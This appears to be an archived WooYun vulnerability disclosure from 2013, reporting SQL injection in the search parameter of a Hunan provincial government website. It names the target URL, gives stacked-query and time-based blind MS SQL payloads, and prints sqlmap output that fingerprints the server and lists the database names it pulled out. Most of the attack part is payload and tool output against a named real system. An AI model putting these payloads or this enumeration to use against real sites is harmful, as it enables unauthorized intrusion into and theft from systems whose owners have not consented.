乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-28: 细节已通知厂商并且等待厂商处理中 2013-07-02: 厂商已经确认,细节仅向厂商公开 2013-07-12: 细节向核心白帽子及相关领域专家公开 2013-07-22: 细节向普通白帽子公开 2013-08-01: 细节向实习白帽子公开 2013-08-12: 细节向公众公开
http://bmj.hunan.gov.cn/newssearch.aspx?searchKey=1
---Place: GETParameter: searchKey Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: searchKey=1'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: searchKey=1' WAITFOR DELAY '0:0:5'-----[03:48:19] [INFO] testing MySQL[03:48:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries[03:48:19] [WARNING] the back-end DBMS is not MySQL[03:48:19] [INFO] testing Oracle[03:48:20] [WARNING] the back-end DBMS is not Oracle[03:48:20] [INFO] testing PostgreSQL[03:48:21] [WARNING] the back-end DBMS is not PostgreSQL[03:48:21] [INFO] testing Microsoft SQL Server[03:48:26] [INFO] confirming Microsoft SQL Server[03:48:33] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[03:48:33] [INFO] fetching database names[03:48:33] [INFO] fetching number of databases[03:48:33] [INFO] retrieved: 19[03:49:05] [INFO] retrieved: 2007xz[03:51:58] [INFO] retrieved: 743072[03:54:41] [INFO] retrieved: bmj[03:55:58] [INFO] retrieved: ecc[03:56:57] [INFO] retrieved: eip_asp[03:59:59] [INFO] retrieved: hndfz[04:02:22] [INFO] retrieved: hngzw[04:04:52] [INFO] retrieved: hunanbb[04:07:47] [INFO] retrieved: master[04:10:04] [INFO] retrieved: model[04:12:22] [INFO] retrieved: msdb[04:14:04] [INFO] retrieved: Northwind[04:18:15] [INFO] retrieved: press[04:20:59] [INFO] retrieved: pu[04:22:31] [ERROR] invalid character detected. retrying..[04:22:31] [WARNING] increasing time delay to 6 seconds bs[04:23:28] [INFO] retrieved: smbweb[04:26:19] [INFO] retrieved: temp[04:28:37] [INFO] retrieved: tempdb[04:31:47] [INFO] retrieved: xmtj[04:34:07] [INFO] retrieved: zbjc[04:36:06] [INFO] fetching tables for databases: 2007xz, 743072, Northwind, bmj, ecc, eip_asp, hndfz, hngzw, hunanbb, master, model, msdb, press, pubs, smbweb, temp, tempdb, xmtj, zbjc
危害等级:高
漏洞Rank:11
确认时间:2013-07-02 23:55
暂无